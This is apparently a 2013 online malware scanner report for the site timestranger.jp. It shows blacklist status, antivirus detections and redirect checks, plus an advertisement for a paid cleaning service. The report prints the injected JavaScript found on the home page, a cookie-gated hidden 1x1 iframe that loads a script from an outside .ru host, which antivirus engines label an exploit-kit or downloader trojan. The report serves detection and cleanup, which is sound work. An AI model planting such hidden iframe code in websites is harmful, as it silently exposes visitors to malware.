Online Malware Scanner report for timestranger.jp

New scan:

timestranger.jp

(cached results from Thu Jul 4 17:58:40 2013 rescan)

Website Malware
Cleaning & Monitoring

Malware cleaning service from eVuln team.

  • Website cleaning
  • Redirects removal
  • Log files inspection
  • Reason eliminating
  • Blacklists removal
  • One year monitoring
  • Repeated fixing

website(s)

$119.00

Malicious/Suspicious/Total urls checked
1/0/3
1 page has malicious code. See details below
Blacklists
Found
The website is marked by Google as suspicious.

The website "timestranger.jp" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues. Here are our suggestions how to fix this.
Malicious redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Setup daily monitoring of timestranger.jp

Paste the following HTML code anywhere into "timestranger.jp" website.

eVuln.com

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=timestranger.jp

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://timestranger.jp/
200 OK
Content-Length: 4992
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

function zzzfff() { var gr = document.createElement('iframe'); gr.src = 'http://lacihgiq.ru/count30.php'; gr.style.position = 'absolute'; gr.style.border = '0'; gr.style.height = '1px'; gr.style.width = '1px'; gr.style.left = '1px'; gr.style.top = '1px'; if (!document.getElementById('gr')) { document.write('<div id=\'gr\'></div>'); document.getElementById('gr').appendChild(gr); }}function SetCookie(cookieName,cookieValue,nDays,path) { var today = new Date(); var expire = new Date();
... 235 bytes are skipped ...
name ) { var start = document.cookie.indexOf( name + "=" ); var len = start + name.length + 1; if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( ";", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) );}if (navigator.cookieEnabled){if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/');zzzfff();}}

Antivirus reports:

AntiVir
HTML/ExpKit.Gen3
Avast
JS:Iframe-AHW [Trj]
nProtect
Trojan.JS.Iframe.DEE
K7AntiVirus
Riskware
Emsisoft
Trojan.JS.Iframe.DEE (B)
Comodo
TrojWare.JS.Agent.DT
Kaspersky
HEUR:Trojan.Script.Generic
Microsoft
Trojan:Win32/Quidvetis.A
MicroWorld-eScan
Trojan.JS.Iframe.DEE
Fortinet
JS/Iframe.DCV!tr.dldr
NANO-Antivirus
Trojan.Script.Iframe.bopaxv
F-Secure
Trojan.JS.Iframe.DEE
F-Prot
JS/IFrame.RS.gen
AVG
HTML/Framer
Norman
Blacole.QH
Sophos
Troj/Iframe-JH
GData
Trojan.JS.Iframe.DEE
Commtouch
JS/IFrame.RS.gen
BitDefender
Trojan.JS.Iframe.DEE

http://timestranger.jp/main/index.html
401 Authorization Required
Content-Length: 2254
Content-Type: text/html
clean
http://timestranger.jp/test404page.js
404 Not Found
Content-Length: 2275
Content-Type: text/html
clean

Malicious redirects

First query (normal visit):
GET / HTTP/1.1
Host: timestranger.jp

Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 04 Jul 2013 14:58:41 GMT
Accept-Ranges: bytes
ETag: "b7082b3-1380-4e09b9e959b00"
Server: Apache
Content-Length: 4992
Content-Type: text/html
Last-Modified: Wed, 03 Jul 2013 13:41:32 GMT

...4992 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: timestranger.jp
Referer: http://www.google.com/search?q=timestranger.jp

Result:
The result is similar to the first query. There are no suspicious redirects found.
Infected sites found